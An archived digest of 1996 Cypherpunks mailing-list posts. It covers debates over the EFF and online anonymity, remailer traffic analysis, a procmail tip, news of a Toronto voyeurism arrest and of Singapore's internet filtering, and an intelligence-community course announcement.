Drop me a note if you plan to attend... NOTE: My primary e-mail address has changed to use my own domain. You can reach me at "claborne at cyberthought.com". Permanently replace any other address that you may have for me. I am currently not subscribed to the CP list since my current internet connection is slow (I can't afford anything right now :) 2 -- C -- -----BEGIN PGP SIGNATURE----- Version: 4.0 Personal Edition -----END PGP SIGNATURE----- ... __o .. -\<, Claborne at CYBERTHOUGHT.com ...(*)/(*)._ Providing thoughts on your computing problems. http://www.CYBERTHOUGHT.com/cyberthought/ PGP Pub Key fingerprint = 7E BF 38 3F 24 A7 D1 B0 54 44 96 AA 10 D0 5D 51 Avail on Pub Key server. PGP-encrypted e-mail welcome! Dreams. They are just a "screen saver" for the brain. From declan at well.com Wed Sep 4 16:46:33 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 5 Sep 1996 07:46:33 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail Message-ID: Toronto Sun, 04sep96 Sneaky photographer charged ... by Tom Godfrey A retired high school shop teacher has been charged after a man allegedly used a camera hidden in his size 12 shoe to secretly videotape up the skirts of young women at the CNE. Det. Mike Beauparlant said a man photographed up to 20 women with his "shoe cam," which contained about seven hours of footage when he was arrested at the CNE last Saturday night. Beauparlant said investigators believe he got the idea from surfing a voyeur news group on the Internet. He ordered a $400 fibre optic lens and fastened it in a brogue shoe, police allege. 
The Oxford-style footwear contained a false front and two small screws on the sole to which a bracket and lens were affixed. "I've never seen anything like this in my 21 years on the force," Beauparlant said. "This was ingenious." Beauparlant said the body of the camera was hidden in a waist pouch and connected to the lens on the shoe with wires that ran under a man's pants and through his sock. "He always photographed very attractive women in their 20s with short skirts," added Det. Const. Mike Dicosola. He said the man was detected by two couples who noticed him moving his foot under the skirt of a woman. They followed the man, held him and called police. Police ask women who feel they've been victimized to call 808-5289. George Walter Campbell, 62, of Cornwall, has been charged with sexual assault and mischief. He returns to College Park court on Sept. 10. He was released on $750 cash bail yesterday. -30- From janzen at idacom.hp.com Wed Sep 4 16:47:56 1996 From: janzen at idacom.hp.com (Martin Janzen) Date: Thu, 5 Sep 1996 07:47:56 +0800 Subject: How to use procmail In-Reply-To: <199609042119.QAA06971@homeport.org> Message-ID: <9609042045.AA27973@sabel.idacom.hp.com> Adam Shostack writes: > Rule introductions of the form :# are depreciated. You should always > use :0, which means any line starting with * is a rule. > [...] > And :0: means use a lockfile on the folder. > [...] > :0 > *^Subject:.*unsub > /dev/null > :0: > *^TOcypherpunks > cypherpunks Thanks, Adam. I created my .procmailrc a long time ago, using the old 2.?? version, and now just cut and paste as required. New procmail users, listen to Adam! (And read the man page, even though it's a bit intimidating at first.) MJ From aba at dcs.ex.ac.uk Wed Sep 4 16:51:03 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Thu, 5 Sep 1996 07:51:03 +0800 Subject: What is the EFF doing exactly? 
In-Reply-To: <199609031904.MAA23619@eff.org> Message-ID: <199609042000.VAA00708@server.test.net> Stanton McCandlish writes on cpunks: > [again, since I'm not on the CP list these days, feel free to bounce this > over to the list if it doesn't make it. I'm not sure what the > non-subscriber posting policy is and/or whether such attempted posts are > filtered out, though I seem to recall they didn't used to be.] Cypherpunks always has been and remains an open list. You shouldn't need to wonder given cypherpunk views on free speech :-) > Black Unicorn writes: > > enough with its own policy to prevent its staff and board from making > > embarrassing big brother type proposals to curtail the ability of any of us > > to post without attribution would be an alternative. I think an > > In other words you propose an alternate EFF that censors its own > boardmembers. No. But I too am rather surprised to hear an EFF board member apparently speaking against free speech. OK, so maybe she was mis-quoted so I wait for her rebuttal, but nope, she basically to my reading reiterates nothing but negative opinions on free speech and anonymity. Tim's quotes of her CFP speech further demonstrate her leanings. > I'm not aware of any logical consistency that could adhere to an > organization that simultaneously says it supports free speech, yet > demands that its board of directors never speak except in agreement with > the organization's policy. You are asking for a mini-dictatorship. EFF > has no position on anonymity. We also have no position on abortion or on > whether roast duck is better than fried chicken. You are in essence > demanding that EFF impeach any boardmember that offers an opinion in > public or in private about whether or not chicken is good stuff, or states > a belief about right to choose v. right to life positions. > > I'm sorry that we are not totalitarian enough for you. 
Let's put it this way: if Louis Freeh offered to be an EFF board member, would you take him on board? If he seemed quite pro-anonymity, and free speech, and later turned out to be having doubts, would you keep him? Ie if her views are proving a liability for EFF's reputation, perhaps you all ought to get together and see if you can work something out? Anonymity is a pretty darn major issue here, so it'd be really sad to see EFF coming down on the wrong side. I've seen some of the other EFF insiders' own opinions, and would like to see them adopted in place of Dyson's views, which whether they are her opinion or not, are more likely to get misrepresented by the press as such, in face of a lack of an EFF position. EPIC's statement looked a reasonable start. > Incidentally, Dyson made no such proposal as you refer to, but simply > expressed questions and doubts about the misuse of anonymity, and made a > clear and correct statement of fact ("you need to be able to get at > somebody's identity to enforce accountability") without offering any > value judgement about whether that was a good idea. She sounded pretty anti-anonymity to me. Is there a shortage of political and net-aware libertarians for board candidates or something? > She concluded that "the question is how do you also enforce freedom > of speech and freedom from prosecution for unpopular opinions," > clearly indicating at least as much doubt about the value of any > attempt to force identifiability and accountability. Even Dyson's > lead statement that "the damage that can be done by anonymity is far > bigger" online that offline is factually correct, and does not > consist of any kind of value judgement. It's simply an honest and, > IMNERHO, necessary observation. Perhaps the quote was unfortunate, perhaps she has also said pro-anonymity things. But a person who is pro-anonymity would surely try to emphasise the pro arguments also? 
The material I have seen so far does not seem to indicate that this is the case. If this is the case she needs to be _much_ more careful about what she says in `personal' interviews. > If we lie to the public, or lie to ourselves, we lose, because the > opposition will have arguments we have not even looked at much less > wrestled with. > > I'm sorry we are not self-delusional and dishonest enough for you. Be sure to express the pro-anonymity arguments while you're zealously hammering out every last thing that can go wrong with anonymity: like that free speech is not possible without it. It's pretty much all or nothing, either you think free speech is worth the risk, or you prefer big brother, government access to keys, the works. [see http://www.c2.org/~winsock/ for a windows remailer] Adam -- #!/bin/perl -sp0777i In Tim's Cyphernomicon, he says - I have heard (no cites) that "going masked for the purpose of going masked" is illegal in many jurisdictions. Hard to believe, as many other disguises are just as effective and are presumably not outlawed (wigs, mustaches, makeup, etc.). I assume the law has to do with people wearing ski masks and such in "inappropriate" places. Bad law, if real. A lot of the motivation was to stop the Ku Klux Klan terrorism. On the other hand, the reason it was mentioned on the list a couple years ago was that a woman was arrested in some North Central city, probably Detroit, for violating it, because she was wearing a Middle-Eastern-style chador outfit that covered her face. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From mix at squirrel.owl.de Wed Sep 4 17:13:35 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Thu, 5 Sep 1996 08:13:35 +0800 Subject: No Subject Message-ID: <19960904203437.2587.qmail@squirrel.owl.de> -----BEGIN PGP SIGNED MESSAGE----- Subject: How to send bogus mail to mislead traffic analysis? 
Hi How can I send messages to remailer so that they will get lost? I want to generate a more or less steady flow of remailer-processed, encrypted mail. Can I send to nobody at some_remailer.net? What are the guidelines for that? What are the best remailers to send to? Cheers Bugged - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2i - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2i -----END PGP SIGNATURE----- From unicorn at schloss.li Wed Sep 4 17:17:03 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 08:17:03 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031730.KAA20063@netcom2.netcom.com> Message-ID: [This will be my last comment on this thread.] On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote: > > >I would put forth that you know nothing of my efforts, and therefore are > >in no position to judge me. I would also put forth that the efforts of > >EFF, or lack thereof, are quite public. > > that's my point. an entity that is willing to put its > reputation on the line is inherently more valuable than one that > is not, imho. all the EFF members have good public track records. > what EFF has accomplished is checkered, like any battle-scarred > infrantry will experience. 
if you expect unadulterated success, > you're not living in the same reality everyone else around here > is. If you're going to ask me for money and support, you damn well better produce unadulterated success. > granted, EFF has made some serious compromises in their agenda. > they're finding their identity. but it doesn't help to have people > rant at them and ignore their notable successes, and tend to criticize > them merely because they're a public target. Awww, poor EFF. It just needs a little love and attention. It's trying to be the best compromising entity it can be. It's not fair to criticize it. We don't want to frighten it or anything, it might be stunted for life. > whenever you criticize something, please keep in mind the basic > qualification: what is a better alternative? Sometimes nothing at all can be a better alternative. > sure, EFF hasn't had > stellar success, but then, who has in the agenda they are pursuing? > their goals are extremely ambitious and difficult in the current > climate. lack of success is proof of the difficulty, not of any Again, I'm sure every violin in the place is playing for EFF and it the powerful traumas it has to endure. What do you think this is? The olympics? I don't CARE how hard the job is. You don't get things done by being sympathetic in politics. Maybe, Lance, that's how it works in Colorado, but not in D.C. Take the hearts and flowers crap elsewhere. IF they are asking for money I don't think that excuses are a luxury they can indulge in. > when you begin to understand this, you > won't alienate those you are critical of. EFF members are *tremendously* > open to positive comments. instead you harangue them and lose their > good will to the point that they may tend to ignore cpunk comments > entirely because of your very poor example. 
If EFF is so sensitive that my comments will cause them to close their ears to their potentially most interested constituency, well, EFF is an organization that needs to die and be replaced. > >I think any organization that would apply political pressure rather than > >bow to it would be an alternative. I think an organization in touch > >enough with its own policy to prevent its staff and board from making > >embarrassing big brother type proposals to curtail the ability of any of us > >to post without attribution would be an alternative. I think an > >organization without the internal conflict and strife that has clearly > >marred EFF in past and made it a laughable attempt at cohesive political > >persuasion would be an alternative. I think an organization that had > >official policies on the core issues which it proposes to influence would > >be an alternative. > > why don't you start one then? As I said before, you know nothing of what I am doing. I don't buy the "well then you do it" crap. They are taking other people's money. Do it right because that is their JOB. I don't have time to play about with net politics in D.C. right now. Nor, frankly, do I think my resources in that area would do much good. Maybe EFF can't do the job, which is the position you seem to be taking, then maybe no one can and resources should be allocated elsewhere. Just don't come whining to me about how life is so hard on EFF. Deal. what you seem to fail to adequately > understand is that there is virtually no organization in the world > that is free from the difficulties you describe. whenever you have > multiple people working together, you aren't going to have clear-cut > successes. cpunks are always yelling at anything resembling organization, > which really annoys me. EFF has had tremendous powerful successes in > areas you are conveniently overlooking, in areas that are hard > to measure, such as increasing public awareness. 
can you make a good > case that EFF has had no positive effect? we may be living in a much > darker reality without them. Yadda Yadda Yadda and life is so hard isn't it a shame? > >In short, an organization that had even one of the needed elements of > >legislative influence. (Cohesive, directed, persistent, and > >uncompromising). > > our congress does not have this property after centuries of trying. You confuse legislation with legislative influence. Advocacy with consensus building. > > What is so shocking about announcing that a > >given organization does not support my interests and therefore calling on > >others who share my interests not to make financial donations to said > >organization? > > you can criticize an organization without implying the people who contribute > to it are incompetent, a distinction that has subtly eluded you so far. I can, but I happen to believe that they are. Look at the slips. A political action organization cannot afford to have their primary members spouting off like that. It kills the organization. It has, in my view. Perhaps EFF has an important function. Lobbying is not it. > > Is there something EFF fears in free speech and political > >consensus building? Perhaps if they had a straightforward policy.... > > no matter what they decide, they will be flamed by someone such as > yourself. they do have an agenda. What's their anonymous poster agenda then? > >Phrased another way, who cares what you are tired of hearing? > > the EFF ranting is periodic, and your own sour comments are > a repeated feature of this list. who *are* you? why are you so > critical of everything in existence? based on previous rants, > you're a habitual sourpuss. When people are asking for money and promising results, I expect results. If this makes me a sourpuss, fine, I'm a sourpuss. As for who I am, it is and shall be none of your business. I understand that there is a tendency here to get flaky and passive. "So what, they are trying." 
Hey, life is hard. Sometimes people aren't up to the task. Fine, admit it rather than dragging it on for years and move on. If EFF ranting is periodic perhaps EFF should take a hint? > >No, but when an organization espouses nothing on a given subject key to > >its mission, what does that say? What about when its members espouse > >entirely different and even counter productive beliefs > > again, you are presuming that anonymity is key to their mission. > that's a big leap of faith. there is room for honest disagreement. > you haven't heard of their agenda personally, so you are assuming > there is none. from what I have seen, there is a reasonably > cohesive agenda going on, and I'm not, like yourself, assuming > that it doesn't exist merely because I haven't seen it blared in > a noisy advertisement somewhere. > > I agree with some of the EFF member's comments: anonymity could > be a very serious quagmire to support. there are probably better > trees to bark up. Anonymity is currently the status quo. Tell me, what exactly, if someone takes the position that it is too hard to support, are they going to do to, for example, prevent what I'm doing? Will you be required to register with your ISP? Provide credit references to be permitted on the net? Use a smart card with fingerprint checking to log on? Anonymity is the key. Period. Your failure to see this simply destroys your argument. Look Lance, just because you have not been able to keep from being outted doesn't mean that some others don't benefit from Anonymity. > EFF has lobbied against many of the bills you mention. again, I think > you're being unfair in assuming merely because you haven't heard > of them accomplishing anything, they haven't. If I haven't heard of EFF's accomplishments then they aren't doing their job. > >I do in fact feel the cpunks have a greater track record than EFF. Tell > >me, what has EFF done? 
The list of "cypherpunk" accomplishments in terms > >of making the net a better place to be is, in my view, significant. > >Certainly the discussion here is livelier than anything I've seen from > >EFF. > > ah, the fundamental illusion that is going on here. discussion alone > is WORTHLESS in changing the world. yet we have REAMS of it on the > cpunk list. I'd say EFF has *acted* and put enormous effort into > its agenda. So trying hard is the measure of success? "But he was trying SO hard to get the gold medal, let's just give it to him." Bah. > but it is invisible because its not easily quantified. > ask them how many pamphlets they have printed for the public, how > much mail they have sent out to members informing them of > developments, etc. consider the high-quality EFF newsletter. Wait, wait. Wasn't it you who just said "ah, the fundamental illusion that is going on here. discussion alone is WORTHLESS in changing the world." How are pamphlets any different? > is there anything like that in the cpunk area? frankly I think your > comparing cpunks to EFF is really laughable. I take that almost as a compliment. > they are not even in the same ballpark. Oh, I agree. > >Well what, EFF, have you done for us LATELY? > > EFF hasn't done much for anyone who hasn't paid their dues.. So keep paying Lance. At least you're getting some satisfaction out of it. > > >English is not my first language. Start paying my hourly rate to type in > >the thousands of words and dozens of legal summaries I send to this list > >every month and I will begin to proof read carefully. > > your legal summaries are impressive. your rabid criticisms leave > a sour taste in my mouth. measured criticism, I can deal with. If it's too hot... > >> and you, like many other cypherpunks and cyberspace weasels, > >> have a whine-and-shriek-from-the-shadows bent. > > > >And your point is? > > > >You'd like the shadows lifted? Speaking without a true name attached is > >somehow evil? 
> > really, an opinion without attribution is not worth as much as > one with it. there's no escaping this simple concept. I agree that > a pseudonym can gain a reputation, but yours has very little > associated with it to qualify criticism of EFF imho. so you have > posted regularly to the cpunk list. big deal. By your logic you're not in much of a position to commend EFF or criticise me for that matter then, "Vlad." > >This is EFF talking. "The situation is hopeless, bail now to preserve > >image." > > EFF has changed its direction from working in washington. Exactly. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From jya at pipeline.com Wed Sep 4 17:20:58 1996 From: jya at pipeline.com (John Young) Date: Thu, 5 Sep 1996 08:20:58 +0800 Subject: SG Spy Ring Message-ID: <199609042056.UAA18784@pipe6.t2.usa.pipeline.com> Financial Times, September 4, 1996, p. 4. Singapore looks to superhighway By James Kynge in Kuala Lumpur Singapore took another step toward its vision of becoming an "intelligent island" yesterday, announcing an initiative to link the city-state's main on-line networks. Mr Goh Chee Wee, Singapore's minister of state for communications, said the "internetwork hub" would link service providers of the Internet, government on-line networks, commercial networks and some others. Singapore's move follows an ambitious scheme announced by neighbour Malaysia last month to launch an "information superhighway" designed to attract the world's leading information technology companies to Kuala Lumpur. The perceived advantage in Singapore's initiative is that users will be able to access all networks using a single leased line, rather than the separate lines currently necessary. The hub will use a single set of national standards, meaning inter-operability between networks becomes easier. Mr Goh said the hub should be up and running by the end of the year. 
A mechanism to identify users electronically would be incorporated into the hub network next year, paving the way for secure operations such as payments, banking and confidential correspondence. The move is part of the Information Technology 2000 masterplan, a scheme which aims to accomplish the sometimes conflicting aims of exploiting the information superhighway to its full potential while continuing to insulate Singaporeans from undesired influences. From September 15, the city-state will implement its first big attempt to police cyberspace. From then all Internet providers must channel more than 120,000 subscribers on the island through "proxy servers" before they reach the net. These servers will check every Internet site a subscriber requests and block access to about a dozen banned sites known to display pornography. The government has warned against material deemed politically subversive or inciting religious disharmony. [End] From azur at netcom.com Wed Sep 4 17:34:30 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 5 Sep 1996 08:34:30 +0800 Subject: What is the EFF doing exactly? Message-ID: >Vladimir Z. Nuri wrote: >so in a very real sense, anonymity in >the phone system was considered a "problem" by some that has been >"solved" or "modified" by some recent advancements. (yes, most people >agree caller ID is an advancement). Yes, and that is why some companies (e.g., Private Lines) offer anonymous out-bound calling services. > >I think cpunks should hold the view that communication is a matter >of mutual consent between sender and receiver. if a receiver says, >"I don't want any anonymous messages", then should be able to block them. >this is essentially what is happening with the remailers *right*now*, >if you ask any remailer operator. people ask not to receive anonymous >mail, and are put on the blocking lists. 
imho only the extremists are arguing, >and have always argued, that they should have some ability to put >an anonymous message in front of someone else against their will. > >this basic rule becomes more murky when you look at public forums, >because you can't really say whether given individuals reading them want to >hear something anonymous or not. by designing the forum beforehand >to force the situation, you solve this problem. > I find most unwanted communications objectionable, anonymous or not. How about billboards. Should the fact that I choose to be outside or on a roadway make my eye a target for ads? (If so, then why not consider having an e-mail account in a similar vein?) The fact that I can immediately, or later, identify the responsible party doesn't keep me from initially seeing the ad and taking my time. If I object, what are my alternatives? The last thing I want is monetary compensation. I want my time back. Failing this, I want the abusers time (sorta' like in Zardoz). >I do believe that in the future there will be all types of forums: those in >which identity is required, those in which it is optional, and those in >which it is always cloaked. this is eminently reasonable imho. >those who argue against one of the >above's existence (such as saying it involves a ghettoization >of anonymity, that there should always be an ability to be anonymous >in any communication setting) are extremists imho. "The reasonable man adapts himself to the world: the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man." --George Bernard Shaw PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. 
Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------

From azur at netcom.com Wed Sep 4 17:52:52 1996
From: azur at netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 08:52:52 +0800
Subject: flimflamery on anonymity
Message-ID:

>Vladimir Z. Nuri wrote:
>(last line is sarcasm for the sarcasm impaired)
>a cpunk position I have seen repeated often. it goes along a very
>simplistic line of reasoning that I have seen TCM evoke repeatedly.
>it rather annoys me. it goes like this:
>
>cyberspace is merely discussion between people. anonymity should
>be allowed anywhere there are discussions (its a free speech issue).
>therefore it should be possible everywhere in cyberspace.
>
>this idea lacks a lot of subtlety in thought and to my mind is
>tremendously simplistic.
[snip]
>
>cpunks will also argue that anonymity can suffice for any
>business transaction. that may be so, but what about a business
>that simply says, "we choose to require identity among our
>customers, and you can go elsewhere if you disagree".

These attitudes create business opportunities for others who would seek to serve those who prefer anonymity.

[snip]
>
>cyberspace as a whole is *not* going to lead to a total motion
>away from physical identity. in some ways physical identity will
>be more strictly enforced in cyberspace, in "some regions".
>there will be other regions of cyberspace in which "anything goes".
>

As long as attractive, anonymous, alternatives sufficient for those (of a 'cypherpunk' mind) seeking to communicate, transact commerce, etc. exist it won't matter whether others choose to enforce stricter identity adherence.

[snip]
>of course in the cpunk mailing list, who cares if there are
>anonymous/pseudonymous participants? [snip]... but far more is at stake
>in the "real world" and the risks posed by anonymity will be
>adequately diluted because of this. and it won't be by people
>who are all "f***ing statists"-- it will be by reasonable people
>such as those who head EFF, who are interested in a civilized
>society.
>

As always the market and the street will decide.

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ | Internet: azur at netcom.com
Grinder | Voice: 1-702-655-2877
Sacred Cow Meat Co. | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------

From dfloyd at io.com Wed Sep 4 17:55:30 1996
From: dfloyd at io.com (Douglas R. Floyd)
Date: Thu, 5 Sep 1996 08:55:30 +0800
Subject: Letter to the Observer [re: Internet paedophile]
In-Reply-To: <9609041639.AA25461@cti02.citenet.net>
Message-ID: <199609042131.QAA02995@xanadu.io.com>

>
> On 4 Sep 96 at 5:41, Martin Minow wrote:
>
> > Forwarded to me by a friend:
>
> > The following letters were delivered to the Editor of the Observer
> > last week as a request to publish a retraction of their article
> > relating to the Internet that appeared on Sunday 25th. August.
>
> One way to limit or retaliate against defamation would be to refuse
> internet access to anybody known to be part of any such medias, being
> tv or paper.
>
> ISPs would probably easily agree since the revenues coming from
> journalists vs from the general population is probably minuscule. Of
> course, the conventional media would set up their own ISP but they
> could be identified.
>
> Does that make sense or am I out to lunch?

AOL will take them. Most of them are on there anyway.

>
> jfa
>
> Jean-Francois Avon
> DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
> JFA Technologies, R&D consultants: physicists, technologists and engineers.
>
> PGP keys at: http://w3.citenet.net/users/jf_avon
> ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891
>
>

From declan at eff.org Wed Sep 4 18:10:36 1996
From: declan at eff.org (Declan McCullagh)
Date: Thu, 5 Sep 1996 09:10:36 +0800
Subject: Letter to the Observer [re: Internet paedophile]
In-Reply-To: <9609041639.AA25461@cti02.citenet.net>
Message-ID:

Jean-Francois, your comments are inspired!

As a member of "such media" in that I still publish articles on dead trees -- I have articles in fall issues of Wired and Playboy, for instance -- I rejoice in your reasoned suggestion that you deny me and my ilk access to the Net.

But wait! I connect through wired.com, eff.org, or *.edu accounts. How do you plan to kick me off my "ISPs?"

No, you're not out to lunch.

-Declan

On Wed, 4 Sep 1996, Jean-Francois Avon wrote:

>
> One way to limit or retaliate against defamation would be to refuse
> internet access to anybody known to be part of any such medias, being
> tv or paper.
>
> ISPs would probably easily agree since the revenues coming from
> journalists vs from the general population is probably minuscule. Of
> course, the conventional media would set up their own ISP but they
> could be identified.
>
> Does that make sense or am I out to lunch?
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From jonl at well.com Wed Sep 4 18:31:41 1996
From: jonl at well.com (Jon Lebkowsky)
Date: Thu, 5 Sep 1996 09:31:41 +0800
Subject: What is the EFF doing exactly?
Message-ID: <2.2.16.19960904170224.40bfe688@mail.well.com>

At 08:02 PM 9/3/96 -0700, James A. Donald wrote:
>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>>>> Not necessarily. The character of the anonymous speech is decisive. If you
>>>> use anonymity to cloak harassment, for instance, the anonymity (which
>>>> removes accountability) is a problem. The accountability issue is real and
>>>> should be addressed, not evaded.
>
>At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
>>>No: The harassment is the problem, not the anonymity that makes it
>>>possible.
>
>At 06:52 AM 9/4/96 -0500, Jon Lebkowsky wrote:
>>The harassment is one problem, the lack of accountability another.
>
>So:
>
>Lucky Green and Dark Unicorn are not accountable. This is a problem?
>
>Because it is a problem "We" need to do something about it,

Looks like you didn't quite finish yer msg...what is it that "We" need to do about it?

--
Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com

From azur at netcom.com Wed Sep 4 18:51:08 1996
From: azur at netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 09:51:08 +0800
Subject: Intelligence Community Briefing
Message-ID:

My security clearance has long since expired. Anyone on the list plan to attend and report back :-)

------------------------------------

AFCEA

The U.S. Intelligence Community: Who Does What, With What, For What?
October 8, 9, 10, 1996

#### This course is Classified SECRET. ###

Sponsored by The Community Management Staff.
Location: AFCEA International Headquarters, Fairfax, Virginia

The U.S. Intelligence Community continues to undergo substantial changes. This top-down course provides an up-to-date understanding of the structure and functions of the Intelligence Community and its components, the changing threats and challenges with which they must deal, as well as resources and processes used. The course addresses intelligence programs structure and provides insight into relations between intelligence producers and policy consumers, as well as useful information about the interaction between U.S. Intelligence and industry.

WHO SHOULD ATTEND

This course is suitable for industry managers, designers and producers of security and intelligence systems and products, including software and special purpose products.
The up-to-date coverage of the changing intelligence community is equally suitable for intelligence officers and operatives proficient in their own services or specialties who have or expect to have responsibilities involving other agencies and services, overview functions or supervision of interfaces between various agency efforts. Past attendance has been divided about equally between persons from the government and from industry. COURSE OUTLINE: Intelligence, Practice and Issues Background of U.S. Intelligence Definitions of Intelligence Intelligence Process Relationships between Intelligence and Policy Systems Intelligence Issues Components and Coordination of the Intelligence Community Organization and Components of the U.S. Intelligence Community The Role of the DCI DCI Special Staffs and Multi-Agency Activity Centers The Community Management Executive Director and Staff The National Intelligence Council Intelligence Oversight and Management within the Executive Branch Civilian Intelligence Organizations Military Intelligence Components Coordination of Counterintelligence Intelligence Budget Structure NFIP TIARA JMIP The Central Intelligence Agency Structure and Functions of the Changing CIA Intelligence Collection, Analysis and Dissemination CIA Support to Military Intelligence Operations Military Intelligence OASDC3I Organization and Functions Structure and Functions of the Defense Intelligence Agency Support for OSD, JCS, and Operational Commands Military Services: Organization, Roles and Missions Impact and Trends Resulting from Changing World Situation and Operational Experiences Overhead Reconnaissance and Surveillance National Reconnaissance Office Defense Airborne Reconnaissance The National Security Agency and Central Security Service Role in the Community Specific Functions Services of Common Concern Federal Bureau of Investigation FBI Organization and Functions Law Enforcement Intelligence Functions Counter-Intelligence Relationships with CIA and 
Other Components of the Intelligence Community Counternarcotics Intelligence and the Drug Enforcement Administration The Problem The Counternarcotics Community DCI Counternarcotics Center Operational Counternarcotics Intelligence Activities Imagery The Central Imagery Office Relationships with Other Parts of the Intelligence Community Support to Operational Commands Intelligence Support for Arms Control and Disarmament Arms Control Intelligence Staff Non-Proliferation Center On-Site Inspections Nuclear Intelligence and Role of Department of Energy Intelligence Community and the Congress Functions of the Oversight Committees Legislation Affecting the Intelligence Community Trends Intelligence and Industry Relationship Between Intelligence Components and the Private Sector Opportunities to Market Services and Products Control Mechanisms Business Strategies Intelligence Developments in Private Industry Internal Intelligence System Risk Analysis Course Coordinator COL John D. Sitterson, USA (Ret.), is now a consultant to AFCEA and industry. His military career included assignments in intelligence and international security affairs, as well as combat and commands with extensive C3I involvement. He headed the Department of National and International Security Studies at the Army War College. Colonel Sitterson served on a White House Task Force, in operations coordinating elements under NSA, on a Presidential-Congressional Commission, and as a military member of two blue ribbon study groups at the Council on Foreign Relations. As a civilian he served 20 years in defense-related government and industry positions, including 11 years with HRB-Singer (now HRB Systems). Lecturers: Mr. Peter C. Oleson has had extensive experience in intelligence related positions in the U.S. government and industry, including the Office of the Secretary of Defense. He has been adjunct professor of Resource Management at the Defense Intelligence College. He now heads his own consulting firm. 
Other lecturers will be authoritative representatives of the Central Intelligence Agency; Community Management Staff; the Office of the Assistant Secretary of Defense (C3I); Defense Intelligence Agency; National Security Agency; Intelligence Services of the Army, Navy, Air Force and Marine Corps; the National Reconnaissance Office; the Defense Airborne Reconnaissance Office; the Central Imagery Office; Department of State (INR); Department of Energy; Federal Bureau of Investigation; Drug Enforcement Administration; Arms Control Intelligence Staff; Non-Proliferation Center and the House of Representatives Permanent Select Committee on Intelligence. Register by submitting the following information to: AFCEA 4400 Fair Lakes Court Fairfax, Virginia 22033-3899 Phone: (703) 631-6135 FAX (703) 631 4693 email = aafceapdc at aol.com until 1 October and then pdc at afcea.org Course Name or Number: Intelligence Course/ 203N Date Course Convenes: 8 October 1996 STUDENT: Rank/Honorific: Service: First Name: MI: Last Name: Title/Position: Company/Organization: Division: Mail Stop/ Suite/ Office Symbol: Street Address: City: State: ZIP: Country Telephone: (area code) Fax: (area code) Please indicate method of payment intended: Mastercard/Visa/AMEX/Diners Club/ DD1556/Voucher All registrations will be acknowledged. The acknowledgement letter will contain information on location of the course, housing and transportation details. Fees: Government Personnel $700 Industry $950 ### A Classified Visit Request must be submitted by mail or fax before the student is permitted to attend the course. This request should be received at AFCEA at least the week before the class convenes. ------------------------- PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. 
Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------

From azur at netcom.com Wed Sep 4 18:57:10 1996
From: azur at netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 09:57:10 +0800
Subject: Reputations
Message-ID:

"Regulation - which is based on force and fear - undermines the moral base of business dealings. It becomes cheaper to bribe a building inspector than to meet his standards of construction. A fly-by-night securities operator can quickly meet all the S.E.C. requirements, gain the inference of respectability, and proceed to fleece the public. In an unregulated economy, the operator would have had to spend a number of years in reputable dealings before he could earn a position of trust sufficient to induce a number of investors to place funds with him. Protection of the consumer by regulation is thus illusory." -- Alan Greenspan

TCM, seems like a reputable source to support your views.

-- Steve

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ | Internet: azur at netcom.com
Grinder | Voice: 1-702-655-2877
Sacred Cow Meat Co. | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------

From jimbell at pacifier.com Wed Sep 4 19:03:26 1996
From: jimbell at pacifier.com (jim bell)
Date: Thu, 5 Sep 1996 10:03:26 +0800
Subject: Race Bit: C
Message-ID: <199609042222.PAA19090@mail.pacifier.com>

At 02:47 AM 9/4/96 -0700, Timothy C. May wrote:
>At 3:02 AM 9/4/96, James A. Donald wrote:
>>At 10:33 PM 9/3/96 -0800, jim bell wrote:
>>>>The Leahy crypto bill introduced early this year made (paraphrasing) "the
>>>>use of encryption to thwart a law-enforcement investigation illegal." I
>>>>immediately pointed out that while this wouldn't make _encrypted_ remailers
>>>>illegal, per se, effectively it would because the moment an investigation
>>>>(even a phony or trumped-up one) is started and is "thwarted" by the
>>>>encryption used, the remailer operator became guilty of a crime.
>...
>>I believe that judges have a policy of interpreting deliberately
>>ambiguous statutes in whatever way makes the most sense. The only
